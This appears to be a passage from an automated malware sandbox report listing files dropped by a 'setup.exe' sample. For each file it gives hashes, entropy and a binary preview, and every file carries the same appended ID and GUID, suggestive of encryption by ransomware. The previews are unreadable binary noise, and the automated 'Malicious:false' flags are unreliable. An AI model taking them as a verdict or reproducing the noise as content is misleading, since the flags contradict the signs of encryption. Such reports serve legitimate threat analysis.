              Preview:<?xml.g...OB@.'[4...u.....@f.'..?.u.t3....x:....,dA..~e.0..`Wn...n...T`.......W....".....;<....X4....Z..d..=..?....l......W.qj.E...g....e.\:.Y.\l...-A2....2W..p...^wZA#..O.>.9.K.[..+.#2.{uaeo...%3k....s...%-}.<rqE...gX.v$...9E....b.s..P....X...U1{a(.K..0.S.olk...e.w._.)blM...>.4.} .Q9........=N......u..'7..{.u.av>..rKE...C..pZ....7..\..lkA..eZ..To..UA"g]..@."jl.i.hV..f..|*f..+S...G5T.P.q..GN.`u)`2......-..A...j.<O.!.....<T|.|..`...].,V.{c|.B.D{.bef.u2............[x....].gq.7e....vQ.@.}A7_..E...a....(.........H|.Y..i..U..f...E.._.4..&...y.;'..H..k...S.VA....$.....r.+..K........r....;'$.t..n..E.O.?./..`.& ..QnHv..:,.*...E.1.....].5u..>pv...]..$.XN.P..{_<}[:.'....4....y0;...t.J..t..$.].t...i|.(.O..1^VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.723244782265647
              Encrypted:false
              SSDEEP:12:Av7ZnSZod+66MzOdSX9jcH1NnE+XshqTvgN5ZBPN3y/0mT6t6L9CWPOAUEUosyxR:Av94bJd0gaUs8Ty5Q/BT6rWPOOUCxxjX
              MD5:D8B984178C31D0F05BA60F4FCE95C97C
              SHA1:74112B6295AE679E30B9CBE2DD4689EFCEEC7FB9
              SHA-256:9CF8E9A17701560BD311DA87D02A898471845E5B3892F15E6944AF7AB7272D78
              SHA-512:C2B46C85E4F3A30279F9A057199A19EF1C3E9F1ED5FA0DC3A19905C1A6700795FD52E88A597F02A90E7C1BA9A420E0421CACEAB56DCA505B37E11580ECEC5FB4
              Malicious:false
              Preview:<?xml}M_...=Xo..>.j.i..C..G..-k@..I...<......\:F....|.(1.Y(.C.....uE.>..u..2..\.#.B|.m..B.......<..gW.D..H...g.4....N.......L^].....2"./.W*.B.....xN.5pI.y..Fz4.f..z.....W.r...A..K@..(^..`?\..<&..^..l....2..f8.....w...%..D..E.M...1.SPu.J9..@......[ly+.2'..b{r......_@..}y.8Z... B.u.e.ws.....e...I........T.......2...Xm...^...._...2Y.........)....^......=.MX../..PS..ju.y....2.F$......F...c3.ki........./.Dc.Wz....71.......,.Aw8.......M.>....&....m....SL]`Q"R..0.=&.j...7...Y......Q..Va.kx.U.....t.f.....2.2....E..J.S.v.....s5Iq..x...4U....#O,.'.. d..cZ..q...~.>.@a..?..{.q5!X.9.....r.4.k.}G..*....?.?..j....."I0B..{?.<T<\........I.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.684755893999687
              Encrypted:false
              SSDEEP:24:wptWRQkqx6deSQQue+qMQDfIqNynwbtbD:wjW2k060PRoQnqD
              MD5:A21AB787266D832BEFB4A5C5619EB434
              SHA1:35B1246AD63A5065AF3638CBBAB8368A28C21A83
              SHA-256:020761BF3BBA2A2B7993708504A35E9135BC954BF463B3416B28B7E84084184E
              SHA-512:7B384C2642399AE2DF01E9922FD556B891499BE12D3D3809CDE985F66F078EDAEC63F2F485EAE7800F6E27284C8A91657D6E1F49196CF7B49AA8FCC070307D20
              Malicious:false
              Preview:<?xmlM.D.x...9E...J..W.n..?.. ...:@....&5.! F.....Q.q......B.<.....VQ..1.F.~1T.j.*......O....X.v#e)W.{....|...#......Y5f..M...........+...0..L_..?g%.h.t...V.j.i.....@..?..FC.$...`.4Sdx_31n...'L0..}0....O.; .*.4.3..!..EM..H;.....:Fl......wO(#.2eQ..?...../%........'..>|i.:r.T...q...H.9?_..!Q2T.. ...v s.k.}.E..A..R+.9{..v-.N].....V..r.dN.2.Eb0QA.#...~.(.+..px%"e.s...".9....UU....w..w..l$....m.1.{-j-.B......&~...q_..Lx..5P};...[..dx..'..^V...6lA....l13....yx..... .G._..#..n..z.}...rCv..=..!...L.8....A....=.......m..x.C....,.....d.8.N...Z.;...o.Z.).Kt...$.....?T!e6.l. i....H.&.t.....4>..p...7....04.).4=........[.......$.hz..|.......q......F....j.3c..~...I......Y.*.N(...w..h5s,.....--...y./VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.677246269416858
              Encrypted:false
              SSDEEP:12:HopmJm0yFLFAXqVlhgKWqZQVmf+uxQ2v5YOCQn0n35PKvurqOx3cpuq2lZL5tiyP:HHJhWyas89x4OCQc3zGpuq2lbLfbD
              MD5:6973C08AAB1A03B6230E093C659AB5E7
              SHA1:D496FB9A37A37F0F0463404B46581F766D2FABC6
              SHA-256:CA19F2433991E61AFF66D410327B00EF1BED3C76587AA128AA91A8E4BB54EEA0
              SHA-512:03B79C731BF15FCEADD5150461E6D781DD3CD2CA2437E7F5920B58D2F6CABE0C7325C5A38809ACE93499906735A411222DB2524DC449EBC44D5AF654831DD39E
              Malicious:false
              Preview:<?xml.D....}@C.)I...C/....<..k..Z.p.;c...m=.{.I.@...+#....2.>(..[...NF?...f.A)..A(..[g..[....:..<0...3,.C....r...7...V..icBz'..PG..M...l..qn. .....2....N..ex.1D.?..sx..T.c....... .?.&..$....2_...qM...z~.-$I.}k..Q...yz.r..>............o.F...+...L....X.6Y..y.[g$.rs1h..U.*h..;.[c.`.o.z.~K ..D...#qD........~y.."....<h..A..._...q.(.D....uW.......B..$.J..L4.0..)q/.Z.R..tP.N....L...+u........0M..)]...(...o..T.:....&~@y..u6...k.y...F..+p..~.R.#...l..U.?..o.t.].8!R.a....p ...u...jL_...7>:C&...1.....$.ZQ.D|..N.N..zn........6C.3.^.Z.~.9...~L..c.9.sT.F.......S.).N.r......2..L...........p(}%...I.a{%.p\m.O...\c*.M..[..dc..bV.`WkO....+.f.P..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.715977805325861
              Encrypted:false
              SSDEEP:12:Ck+Xf/DtuYvk8OMJOFxgkUaO/VWTQpeFYwF+4efa5cmnKkLWQqd/Squh5/Pr/Afl:sfrvkcJOFx6BWTQpePzn5cmn3qspkjbD
              MD5:B9EB126B1BDDC5059C55E9576F256582
              SHA1:820878B4911EFD8B58EEEF2E908C1A5F6F53B70E
              SHA-256:042319062CEB36E7CBABD06FD0A8AA7289292EC07138ABB7FC9F3ADE8448C5F4
              SHA-512:267F9FAFE53F66DC5686C8FF7D1AF270FDBFBE9AE4B6A1CFA0C45A8813545D9882B6B5A458175000F83E4826D26A781B69E9AC823644C149B59CFA9C7788EBBE
              Malicious:false
              Preview:<?xml..9.Q0.$.JUu%#....Vj..?"..O?...[. ....r.. ..^S...4...]....M.-...=Av.o5.<*.\...aa.t.u=I....u.......f. ....U........j...'H..D.).....MZ....+>.....T.k..+.....D..|a...Q.. S.,]+..Mi...>.......O.@#...\Bb....%5...{.q~Ff.M@.&..i..\jf_.w`U.6Y...|._...V2..RJu.^U.W..Q.~x.y..H}.U..c.).......xj.....r.^.:U..........q.1x.y..fy.Y.kb.TU.9..C_uQG.%?...ChdMz-]..nC4.&vi....sR........k..R.W..I..t#.....B.tC.....jh..C..o.....U[...mQ....[.0.z>c..5..f^u......E.jk.=..c6.....M...w....-Q.]...9-..w.p.%..../i.....2...oh....Clx.......+f..U....T..y)..9.qQ.&.......o.K*i..]wo.W.7.^.,o.z/0...GSt..[n.<...&."..K5xI..>.....e......|.h.,Vu8.e.......%....e".....:..a.."^J.).O..+&....H0.ON.~8L/.W.?.L%....Z.ZO..z......./....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.736159309032705
              Encrypted:false
              SSDEEP:12:9sVqWPZ1z+pR92MqrTdDqoc/CGPUZF9kRZ7AB3InyPIQA8akGs6i5V9ZsMR2ciik:9sVqWPZ1ypRMMq5JhGXRZ7b8ICaNbeVy
              MD5:FB7ECC5295FD68A7A97A12922FAF95C2
              SHA1:96E47164528F3D834993C16D2107877D306B2503
              SHA-256:721622CEDBF0F042930ED8E5395560180DCEF2666DD5AFABAF613BC3FB4F3265
              SHA-512:F45EB22DE2BA820B93ECBBFAC3D92C26B4FEECBABED35CF7F4B2E3540922C317286BCE0ADDE28B810892AF6E01ABF57C86867EF2C852DEDA9BAD3A885AB91C2B
              Malicious:false
              Preview:<?xml.........aN..r...M....W(.pM>?.p2w>_2....53o..T.ahx..d"".H~.*X....}*.l....J....!K.&...xZ.. ....#u:%....(l..^..7Ew....,G.f..wHTv....^Z7..2..a.W?..FI....z.A.ve.?f..z.4.Z0bz'9X...(.rX.P...H..6.>."..g..{.SY.&.n..+.>U........G.~..A3.C.>8.r..y.U..&..&b...AU.F...y.c.v.5.Jt.&.7Q".y....t...i.]......K...k.UV...B.x....|g..X.n]...g....#hMu.cx..Q`.......I..o3....:./.n..W.......YY...%..`".i.|....+.....g;s^d...JI.b;...X...r_K.b..s.4.$-I....~n$....q.W.z......9l...:..8A.......Z..c.f.>.=.;.9s.{ ......W.%..k.a..=5c.....9...5.V...K..&O.?...A.:.<S.~....&.5ey.^t....R..#.6yx..@.....p.(.{e.<6...X....'..J..........2..h3;.2MDB......Ae).P.....M..9ZXe..WY.\..~D.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.774512016442393
              Encrypted:false
              SSDEEP:24:y29Z+cINduWwSNTFe8SLM+8uw3/EpjlcKc3YpOKbD:YduYNTwLSVKc3YpOoD
              MD5:3A425D6F27F3F8DF523579370A4A236C
              SHA1:F6271309D997B399524E4318488B4E5DFDF75069
              SHA-256:2CF6F52557E7FC304DC494B1FD7B4846D74B33FDCC4A9D35EBDCF9BE1ADB9A55
              SHA-512:CE3FD5572EAD57F7852DAAED29D8590785D47FF07619B0723B7194ECA70DF92833814C74D173F1D121A92FBCBB8C373C04A5454A94055CCEB25B537A39DF550A
              Malicious:false
              Preview:<?xml.^.I.........X.2....Ve.....s|.~...5T+.4.;..W.....O.<-.pnD|.......PM.T......m.(.b...}aa.iU.Y'1..u%..@..c..P.. QW.h(...._......5..u..8..X..su.ryj....v......+w..+.>.QP....A.Z.d.5......w.n]..Q....,.w.*X.b...DBr.`C..l......>.......d`.Tn..I.=..........S*.'..v6.......q+.....\.u.....i .W.o].Q...W"2w..wx4A,....}.....u..<..?..:.q.W. ......7..d.}.oR..>.`...!~o.......Z.'.H..e].S.f..<..c.......w...:..!E&$\_....h.,..j_x..&..g&u...0..9Q,.'.L3.c.c,?....}.>y........9,.$}.'..;..E[.S../....<..5V....N.0>.`.....M,Kb.7..H...^*...u...".hc....+U.....j!......N=..\..../.)T..pnaV...y2i..8.z[-..F..h=..-....,:.j..H...a....Rj......h.._k!....K...+$....6....1...d..=.F.q$.&.j..vK..i.....u..5....!m.2...(-..G......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.7149091935092216
              Encrypted:false
              SSDEEP:12:vWmr8eI7mUVJM+AsQJJN6xF/Ukh+YZn01g6S3jC6iVpeC1lFjSEsbgKksRs7LAxp:vLoNVJTAzkZZ01CCpp9jSEhKk8s7LAUQ
              MD5:E3C47E89D0FFC0A8786832E64D6DA988
              SHA1:8D950B88FAB08681C4E03C94F8878458CC5F9CE8
              SHA-256:25F1103D073A92BE2D507321C04CF092863393ACB85523889411313B151BAC08
              SHA-512:3798ECBEFB626234FFC5CEC201B3BB83478E0CC062F323163F8CBD6F66F1C9C8BCA26D53D40871FE744743385D96700146DD3F11BFACEBAB8B30CA7ED42E5F9A
              Malicious:false
              Preview:<?xmlP]...P.w...R"......|'.....w.#....$..iW.?....l.E.MD..w+,.....lg\..CB].K..Y.3G...D...%.....X...o}7.....\..<.L.....F..+......<1..4..0.v;.....N....P.&{(........&....{.."..&$_....j....".~...-B...8.s,....1..&a.../.b.R......?.G..E....A(.Kz..1Z.9..doxa<.i.....!...\Z.c...P..(...~.r..(.H_ ......`66.2(...!.,.......]...~...n+.Id.]...."p.H...I#.(.Wt...=k..oM.....+h$..........|...%....t.6..~z...+5eJ%ot.....J....0.V..Jk.i..7.;{.^..Ox\....aG....$..>.....'..U....r..,....2.Op..i..7....F'.H.-......}.sbT..h@[)._7.KTE%|<sVY-...HY2.....e..r...to............s_.]0w.A....6+..qI.`Df*.._9..R.B...#.w.MU...p....A.-z..Q....4..nn.....!.I...2g.*\VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.7122110161402
              Encrypted:false
              SSDEEP:12:bqauK63MmlIbftVCVEJx+3RGapzFvvhZdSFEA3anNIH9N86uiX8LsMR2cii9a:WrK63VY1s6+QajvdE3gNE9K6rrbD
              MD5:2539F4447611FD5B8DCE6C6746904AB4
              SHA1:1CC93FFB7A5FE85EC3BDD1D50C19BE3A2F7D2977
              SHA-256:272ABD5E396DD58C020E0880FD931F1DF9219C62D9E0DE05D3BBB317A62C8BD3
              SHA-512:BEF83E2C543BFBF907450F675C6CFAD73F18017C32918ECF387FC32971F6C32DC49E80CD590C74E0D178558E2A398F703EEE2EFD9F55799BDB2CFCAA0697FB75
              Malicious:false
              Preview:<?xmlpI../u.7.8./.N..L>.Xr....!b.....p.s3IQ....k.Ru,X.....,c..U..#.y.......&`.0i{.Rb.%W...R.....#....A.N7...H.#d7vU.E..!...\Z..^...%.......J.m..c.....b...'..v..[...?.uU..%..O......@f..n...)K>..3..L.'_*.@.\............;....im..z..eH........Nh..A`.:....G....j..:K.g.q(...V.r.@.....R........5..pJ.(O..e.4.. e.......t . n.......GX.5..Q.....|.....&..'_..../._.goQ.L...c.c.^...........<....\@}..e..!)X........]].^0..R......[.j.%}..,.......!....f.R,.........=..EFW%-...`...o..i.{....=....-@.~xf.".....q..R..h....:%..K..I.\.B-.%f.yG.r&..H..*j...X.......Fz.u.ac{)[...G{..Iq.ne..K.F.u..k.....k8LRWv.%..u.Z..P.u$TT<...8.e..Ziy.|....=[....L." P..(.+..V.;....3)..\..et...Vfy ...@,..!...:.g.."F^...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.6830674377501955
              Encrypted:false
              SSDEEP:12:2x8CKG3Mkzh6fuWko3LGvdKrLuyvj3KOzKLwSylthDhR9V5n/0OMzsMR2cii9a:2FZzhs3LCKrCsfzKLwxhD9VMYbD
              MD5:67C237E5DEF5D2B7B15A63FBB56856D8
              SHA1:A249BB4DD91021A9065588D517BB56B262E6CF86
              SHA-256:DF9D361C5206A663AC513D4E59CC7A8828B26F790A6F5CFA5C60FD16175AF5D2
              SHA-512:4C5777984B21F1236BD7F79A380C0C4D58D5653DBC76EA165AA370D6BECCE36CC4AC903F0FD223C2FE7067F42DF7132D178EF86D90A95B2B258DEB80C9EACC25
              Malicious:false
              Preview:<?xml..N....S.[).L.u..................|.9..<Y...,.C3#X..A..AuK.h...n....^.5s.....N......x.6.`.Y`..}W..u#...cb.C.d......{...tY<.a .F.$^..y..w....2I......:!s..F...q..IO.k.......?.D.H.#...U...C.VV.....6.....s.<v.....N..vb.c..*'$C..j...=.[9...7...d.....D...j..}.....A.7..~.T....I.L.K..)....8.&V 4}.Dz.O9.@....\.n[...be.J..&..3..JC...U..K..5.'....N..)...j.V......#.......5:..V7^....M-1..{~..i.......y.fAOA....zg=./k.c.b..l..f)vU.o..^.W{.BD.B'.$..2.#.sQ.....n...x-.J..KOv.......x.exep...$..f......Jh....W-C..#.c.[..-.|....E..;!,..y.S.8.{.o.j.9?.......Q..0..K...o.k.R.Ju..E...K..~.{...&.. \.w.V..I;.(...M.s.Vs..T.}3..CG.jd.......'..DyB].y.i+v{...2{...k.-.[.............S.......Rg..P.@V.7..P.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.75759401581867
              Encrypted:false
              SSDEEP:24:fU8O8kqKxIfGrOwuotbl3U4Esij5u+TgiqEHbD:fUEJr+VXYsi1uigiXD
              MD5:8CA1914CC06455BEAC24EBD9CF430776
              SHA1:C57CE11304DB390DAE28C41A9AB47C3A8CB8B62C
              SHA-256:A60A2A88DE70B5BAD25BC858F088CD8B3DC453082988E3F8788973E7F48A37B9
              SHA-512:EFA218370C72CDF593E38775533058FC531AABA5A73C857D65353577B0FD195A841451C003F403FD9C447D820063C04CF488C2BA0E4B267326620993DCB2EF66
              Malicious:false
              Preview:<?xml.%O..Wwo....h4m!s..h..s2.(..q..JN.=....{E0....+.F..Z ..)..A.J.&V........\..u..IOr...]|..*K...Q.:.....V.F......I....B..jI....'.....SD.. Fh.@n.x.H.. ...@.4..T.~.!......E*Z=.c7....$..;.B.i-..yL^.......s.........F .jM.-XTD....f.M.&]...5.+7^>.....x.d.`..ljh...on`..hg.%.B.Q.U.Er.../.?o.}...oB7..n..`.[....1..K.,..tk./..(.S[...%........r8..r.+...#...80Pi..r...b....O.R^s...'.0ZF.....1?.........'R.U...Jf...B.O._....f.OY...aj..._..S...`._......}.g.u. .%-R...C.6..(+s.9~(...j...\..?D....K.z..q..cW ....T...,@X|.%.yw..........e!.~...1.....5B.y..P...e..3...~.:.-.S5.....2:aCzw...V.. :..S...G............6..tb..X.PA...7/......'..lv6W...8.$c0.)iA...?...W6c,S.'A...mJ.J...+.K..l...?&....E... .w...#.._t..Wgz[VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):744
              Entropy (8bit):7.693621092168042
              Encrypted:false
              SSDEEP:12:EudqfkLHkYt76UPiRFvrfLJl7eRe9llIV2Vd6TTvwRHh0iR/qqxsMR2cii9a:tdqfwEYt3KDrt4o97ZYLwRdSbD
              MD5:6A2D53AC14E00671056F922D585C5C27
              SHA1:09043D5A5614A27B92428F3FADE6D892E7E33E1B
              SHA-256:FE89A58BFF57AFB30C7B4F8E1D30EB5AD6C11C277406F87531FFAC73A1C37576
              SHA-512:432710B805DE6EDD2588F72EFC4513048DEADFB717BE8F7A5443F17A7F40DD368DF9D794523EDBAD7C9E2D48EDDD3F1D0CE07B268564364814540E6F20650D9E
              Malicious:false
              Preview:<?xml9y}S......K"....f.....w[c/..G...|....+|.-.e.g.,]V.2.h.iZ5_R...~..s...ax..61.y..>....6.....\o....WT.....K..L>...6...d../...V..d.!o...{...w......j.Q.).-......"UH..=j.........\o...........X..L.~.S...ZV.9..J....&.......7L...=.."x...ikk..Qs6k.x..@. .}J.F.JW....x`......Wy'n..c..,.Se.]Z{1i.#.:.T..rIJ..!.9..x.\~!$...../[.8.thv..x.50..0a.o...l.]0/.....n..QR,<=c#6.r..A./p....kA.l.....M...Z../!....O..>.V.g...S3.H).8...Lm`b...-.G...dx...~..s^!@.{$.#F..sb\.F.%..>..@.t:...y.N}....'8..n..*.E........f.F.Sq."J.B.&<|9.Wo.*...,fe.........+...7=6$>...(..7<..k.`%..[..t!#X.Z."..S.....b...mV...N$i..`...>F;o..j..8-.5A.;`.E?.Y.g.J.2...F.@..U.\.^..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):803
              Entropy (8bit):7.743138856572214
              Encrypted:false
              SSDEEP:12:BiyM/z90/hstwQIZ5dPmQ5mbaf5ha7LnYbWBCRmFtCJY7kLcTxaUUXvkU/5sMR2X:BitxICtwQy5tTnmgbItjVM9mbD
              MD5:90AB0331102F538854BA4D4D43436FA2
              SHA1:94A776D4AD976026438A05BB9FD7A4FA7A06721A
              SHA-256:3266A755318B959A5FB6A4BA0B603B65AD4248A11947B3D66EBC01CF059ECA8D
              SHA-512:1EB74A2F8BB88D4DC338563E1353C96BC6F0704A9C6814E2D5DF0528BD11CAF7E5579A694FE093BDD11A2E9D02AD96FF8AECE62A089058993A3F1A4EBCE121CA
              Malicious:false
              Preview:<?xmlG.......x5..q..........-..w."P..(.f...xP...<'>.T..l.l...9(..#R.)....Z.'..W..[.w.1.@.{..#.......3.l.v^...TA.~`J=.3?Fe.|.R..... _G".^.,.}...Ksp....s...|..(L)...5...G.....n".W.P....f.B.v..A.5.G3G....".V.h-..&..7.I.....s.0:..N..o5.,X..L.... ..FH.?....A.._h.c.On-o..sTE....<.@.2.^.u.`K?.].&..+...>..(...TrE... `.i....!........,.F.>.g.EY..W.............:.....j.R.Ct....5J.`.(...G..!_.F;x.A..Q.g.7. i.,.(f.%..7...1h.(./G..`.<H+.&.......5...)Pv...j.R<...=..E...{.....@P'...~"S..K...[..5O......@S.K.&6...(..B').N[..j.y4..+..eF`.8........4M.$'...:g.U......r..d.! ....%..D... .<.V.o.p.ox...k".......|q]....:....(..f$.J$P....D.7q..Fj.;A.G.j.\..h.E.Zk.ij.|a.....H..$l.....V.....!...K_..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.715311709561893
              Encrypted:false
              SSDEEP:12:tfv1D5zLazvTGM0D+SUcjtATsGAkE2uSrP4OT9MeyMlyt4Cvs0LpuIub+DVvLyxK:V1D53aOGcjtATsGAk+uPRMRMlat3pdf/
              MD5:317535A848481D34DBACDC7583368EC5
              SHA1:3D607CC41384CFC220016D0496349D361FF3FF05
              SHA-256:346257B34ED1955C411B8FFA446F4279305A0572A5A2AE74C797AA170976FE20
              SHA-512:6E45DB1A86F9B89A6A665F7B0706CE361421A146569F7B6D96D430EEE0163182E7B1B9528537EFE7B40AE8F6970AAF4A194E114CB191EFFF3BF6AF878F87494A
              Malicious:false
              Preview:<?xmlG...A....'Z.D.-.$hh.. D8.3.4cK...y.SNg..'?..... H...O...x..V.n...A.5!.....w}...G..@.....:1..n.FZ.s..BN.t.]...'..S...r.$....*l..yT............i.S..^#....S.2i...p=T[..=.Tn.|[{fD.It~..+...>..h...jm...v..z..L9.".l\.@T..`i..A`qz...mS../...r*.ah..]....7..N>...m.DxZ.|...bZ.f..u.V.dY.6..kXaq7X.....#A.<._S..5.I\.....N..3.D.A...I!.N I60,.......8......m.}.`.j.,W....O.!..m\.b.E.7...S.y@c..P*.H..3.........%.=E.....a,U.HA..M..ll2....I.t..s.PR.q.s.....#n!@.$..tf9.b...b..f%.2e)..\g.q...#d.....bl......O<Lh..A.;.....V%.I.. ...*y..-...../..;..m. ....d..9..-.i........._..sv.[Q. g+.......2....QB.b.I#<#..;.&...bw. ...\..4....e...:wg.]8.T....e\-....I5....lg<..4..M....."VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):835
              Entropy (8bit):7.7255263612090985
              Encrypted:false
              SSDEEP:24:Ngh6NiEnLVP2EjI7qcbIygp3Zt6XzB+6PRvx3zXbD:y6NLVs7bdgFa1+65vx3zrD
              MD5:5429CFC921D5CB1AA03E4A1ADC368EE9
              SHA1:18E52F3605835C32B062648A8A5B24C2430C7224
              SHA-256:D03D569A83F4486E5031E8535E56832076DE7254193B28232EF28ABF30F281B9
              SHA-512:DBE0F9D71EB17584D5FA4A2E4AE726B388186B9823D16D029A1B0A216DD13AEC6326F9C641A2460BE40733570D8073BD4D16B1E9617A4221F2A50A682DC9865B
              Malicious:false
              Preview:<?xml&.s..?c...9.9.@R.&.s..[.N=O..3.Df..#IN..y..5...L..X..I.a.t....#3/..%.:m.*).4V..F9..S>.....[w..h...!x..&I9..N.......M...P.......i(a.e5..^.B.....k....K5`.Fh/..c}.XK.X.....M.6Uv7B.g.R..=./!.....}..s.....K..%. .3.....qWv.......85........n......'.{.~.--hM..T}.V.R7.z.....m.3g...f..."......(..M.*.S......"...CZ|#....w......}8.$.|..nI........'.......[[.4.q...T..Yqk...Y......Q.r..i...kQ./Z.......h..g.3.]U.,'o..."..U.ob....R......N...Ju#.&..B.N<.i..Vs...jD.H^...!.......nX..?..N.%H.g.B..=.}.J...F&..,..(...s....s}On.....e...K.k}.#W...Q...].~.....:r....[..;.*...@....M.-...5i$g..>8i[U..........aR...G..v.............c..\....Pj*;Cj...,p..s...sF<q[.)..N_..R$..q.r?..n0....9.......4......%C.f.y._O6.G.!/W./.$..uy....DDr.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.707322557694987
              Encrypted:false
              SSDEEP:12:Sm41JP2cfWioxi39GYOxPB2q1lUgC5yhxEDRIrKyguTu/9whhsRuGhsMR2cii9a:Q1ZRoxitGmclUTrlIWCTu/9whhUhObD
              MD5:1F4A05DDD1178566D566CE18519CD0FF
              SHA1:A72D5BF9175857F09911953C4B880674774D06C9
              SHA-256:E7774149B7D0E9EB0CA320E6731F34292B4C404C726B43743556118748269987
              SHA-512:9FEA10F1ACCE594A4EBE423D804D7BC5105F10CA6A738CD09F2CF8F822668A7CF95AA83FA9E783ED0604AA280883FC2887452D4D2DFB480AFE3FC787EFDB20D8
              Malicious:false
              Preview:<?xml...!IWB......Gr..s....8].Sn_2.+.I.....T..'.Ay~.x.<^..e..@.|..q.p..FDD.....o....:[M..o?sI........'.&=.`..w.._?.G.g.."..n].X.........+.YxE...k..Cy...4..V..?v...")...l...RuQ.<......Z....2R.0....6S.N8..S;..|k.nd[Zb.`.l.O......a.b...C......$.g.........Ax..H......u.\.....K.....zr.@.........../..b=.~.X.(u*.f.>L.b....bl... .>...Fn*.oAS........ .KE+...hhrY.G.U$jC..:;.....p.rG:.}.+)..Qb..u[...#<h..b..%b..m@.d.....!...v...)...[...F..()!.#{.wt.4....`S+..I.55.(..%....=..H.O.l..P..h.`.v;..............N!.s$..U7.V".Z.Ot.....M....jR...I.mg.....y.......D...?<..{.S..S?'.x.@.4.s-.b._.....,b5D.~..w....quS28.*.z..(..D^$1...q.&..1I.J....8b.?e:.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.720968666960391
              Encrypted:false
              SSDEEP:24:hIX9L++ej7aHvXDxx5pEgl2tvUK95x4bD:+X9iZjuFx5WI2tUKtiD
              MD5:9BB1AEBC8BBA69659D9732D4EF74B793
              SHA1:1069F5BD1D086DD3EA7ED8E69C37649D6A0D381F
              SHA-256:1E29558B89B5C4651B1DCF249279F247935711021E561153B8969A85DC002D93
              SHA-512:1B40508AA199EA586389DD0B105DFB25911EF85C659165772DEA6BD2F65CAEC132FA85EAA7B0DF79AF4A64A427D5404883F539C9F6BCA20164C49933E394153B
              Malicious:false
              Preview:<?xml("/.3...=.{....1kIW..`.*...5,#-Hk.p.........._.@....w.bmjvG.c....cC....b*..X........7..*.yZ.g.].....1C....1.F).k.u.....dAI.|...2..+.....=.s.l......@.....o..&D.{.3.[z<.....R...;!.QU\..p...3T"...e...X...w....>.&}....|9l8..}....5+..j.v..8..U.....@.y.k.v../.~H6.-.....}...9..9....zc..*.....E...@*.<.;.@..7<...b.F.k....].syc.R....u '.l.R..H..r..%.A.!.-.A.N.....Fx...6..c.Y5...@.d.[\Fi.g....4l..M0..1....7....Q.....EsO..a...&v..e..I...@....O.%fZW.,..<'.U..LU..V.....F.fE.....%. .._.k84N-1..,n...;.D.....5..>.....T.#.WD:./2.E1u.....w...f,.%...j..x..e.......A...L...b..V.....6v.oB..c,.L,.w.....;..v._....=.(...y'L.........f..DA..2.-...+Eqev..g...2......./..,..k...i>..@..1.:+.-."D...~..,.......v^"....5.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
